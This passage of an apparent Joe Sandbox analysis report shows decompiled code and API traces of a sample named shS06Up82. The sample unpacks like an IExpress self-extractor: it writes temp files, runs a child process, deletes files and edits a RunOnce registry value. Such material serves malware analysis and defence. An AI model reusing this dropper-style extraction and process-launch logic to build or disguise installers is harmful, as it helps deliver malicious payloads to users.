                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 003E6AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 003E6AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 003E6B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 003E6B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 003E6BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 003E6BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 836923961-0
                                                                                                                                                                                                      • Opcode ID: b6d2d4955b1be6cf4b206a5c8f0b4b46cb00f86e4e98c89993e01c93432fe406
                                                                                                                                                                                                      • Instruction ID: b471c59fa08cd6ff7ef50cd2eeefd9152f53b3f85ee46cd16ce43ef8f10bdbc2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6d2d4955b1be6cf4b206a5c8f0b4b46cb00f86e4e98c89993e01c93432fe406
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03410874D447F6CBDB339B6BDC867AA77A8AB54790F110329E945EB2D0CB704C418B41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 631 3e58c8-3e58d5 632 3e58d8-3e58dd 631->632 632->632 633 3e58df-3e58f1 LocalAlloc 632->633 634 3e5919-3e5959 call 3e1680 call 3e658a CreateFileA LocalFree 633->634 635 3e58f3-3e5901 call 3e44b9 633->635 638 3e5906-3e5910 call 3e6285 634->638 645 3e595b-3e596c CloseHandle GetFileAttributesA 634->645 635->638 644 3e5912-3e5918 638->644 645->638 646 3e596e-3e5970 645->646 646->638 647 3e5972-3e597b 646->647 647->644
                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E003E58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				signed char _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				intOrPtr* _t27;
                                                                                                                                                                                                      				CHAR* _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t27 = __ecx;
                                                                                                                                                                                                      				_t23 = __ecx + 1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t6 =  *_t27;
                                                                                                                                                                                                      					_t27 = _t27 + 1;
                                                                                                                                                                                                      				} while (_t6 != 0);
                                                                                                                                                                                                      				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                      				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                      				if(_t20 != 0) {
                                                                                                                                                                                                      					E003E1680(_t20, _t36, _t33);
                                                                                                                                                                                                      					E003E658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                      					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                      					_v8 = _t10;
                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E58E7
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5943
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E594D
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E595C
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,003E5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5963
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-1860564779
                                                                                                                                                                                                      • Opcode ID: 0a5d3e8ed668fed37a93e6a413c509d5d38045d15940efe5132364234aa47b3f
                                                                                                                                                                                                      • Instruction ID: 62606e2afcc711f4245f0234e5f2d6df1c21b9cabedc10972a1c16d68c01a3d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5d3e8ed668fed37a93e6a413c509d5d38045d15940efe5132364234aa47b3f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF11D0726006A0AAC7265B7BAC8DBDB7A9DDB86364F110715B50ADA2D2CB709C0586A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 675 3e3fef-3e4010 676 3e410a-3e411a call 3e6ce0 675->676 677 3e4016-3e403b CreateProcessA 675->677 679 3e40c4-3e4101 call 3e6285 GetLastError FormatMessageA call 3e44b9 677->679 680 3e4041-3e406e WaitForSingleObject GetExitCodeProcess 677->680 694 3e4106 679->694 681 3e4070-3e4077 680->681 682 3e4091 call 3e411b 680->682 681->682 685 3e4079-3e407b 681->685 689 3e4096-3e40b8 CloseHandle * 2 682->689 685->682 688 3e407d-3e4089 685->688 688->682 691 3e408b 688->691 692 3e40ba-3e40c0 689->692 693 3e4108 689->693 691->682 692->693 695 3e40c2 692->695 693->676 694->693 695->694
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E003E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E003E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E003E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0x3e8a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0x3e9a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0x3e9a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0x3e9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



















APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 003E4033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E4049
• GetExitCodeProcess.KERNELBASE ref: 003E405C
• CloseHandle.KERNEL32(?), ref: 003E409C
• CloseHandle.KERNEL32(?), ref: 003E40A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003E40DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003E40E9

Memory Dump Source
• Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd

Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: 229ab41dd49c9aa64eca9ee604427a598835d5c06a0bd8fa4059960bc96821bb
• Instruction ID: 1b71f4be34f37f812fbe0dd9ff077eeffffb21ba8822b25aa71bbc9f47370ff0
• Opcode Fuzzy Hash: 229ab41dd49c9aa64eca9ee604427a598835d5c06a0bd8fa4059960bc96821bb
• Instruction Fuzzy Hash: CA31A7316406A8ABEB329B66DC89FABB77CEB98710F100369F605D91E1C6305D85CB11

Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E51E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E003E468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E003E468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E003E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0x3e9124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F4D,?,00000002,00000000), ref: 003E5201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003E5250
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: 19932fbb36d2e5dad51428450a51fe3eb5f990c062e5725ee94d51974379a12d
                                                                                                                                                                                                      • Instruction ID: 5dd507bbd4174838edf57d6a86e949ddbccfbb1f1f93f7312e1e950d575b7b8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19932fbb36d2e5dad51428450a51fe3eb5f990c062e5725ee94d51974379a12d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8311E2B52006E1ABE3376B739C89B3B719DDB88394F114B29F702DE2D0DA799C005624
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E003E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0x3e91e0; // 0x2c77cb0
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0x3e8a24 == 0 &&  *0x3e9a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0x3e8a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0x3e8a24 == 0 &&  *0x3e9a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E003E1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      					if(( *0x3e9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E003E65E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E003E2390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0x3e8a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0x3e9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E003E1FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0x3e8a20 =  *0x3e8a20 & 0x00000000;
                                                                                                                                                                                                      				return E003E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(02C77CB0,00000080,?,00000000), ref: 003E52F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(02C77CB0), ref: 003E52FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(02C77CB0,?,00000000), ref: 003E5305
                                                                                                                                                                                                      • LocalFree.KERNEL32(02C77CB0), ref: 003E530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(003E11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E5363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E5334
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 2833751637-2356899610
                                                                                                                                                                                                      • Opcode ID: 621372e670e64a7589d853b7f44e338f14f366ac311565feded837a77af1eb62
                                                                                                                                                                                                      • Instruction ID: c0bed0c306ace6c787ec50843fe035ba868e23440dbd28a443d55c310b252d56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 621372e670e64a7589d853b7f44e338f14f366ac311565feded837a77af1eb62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0621A435900AE4DFDB339B12DD8976977B8AB14754F05036AE8455E2E0CFB06C84CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E1FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0x3e8530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,003E538C,?,?,003E538C), ref: 003E2005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(003E538C,wextract_cleanup1,?,?,003E538C), ref: 003E2017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(003E538C,?,?,003E538C), ref: 003E2020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                      • API String ID: 849931509-1592051331
                                                                                                                                                                                                      • Opcode ID: 8c5f14f1b9ac378e60f75f83250c60f6c6d9aff91fb667dba50df1f5c038cb2e
                                                                                                                                                                                                      • Instruction ID: 212bf7affdfebc90b66c68730e21be0c026df6e4cf5fca06f8ca63dd5c9265d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c5f14f1b9ac378e60f75f83250c60f6c6d9aff91fb667dba50df1f5c038cb2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8E04F319503A8BBD7339B92EC8AF5A7B2DF701740F100394F908A40E1EB617E14E605
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
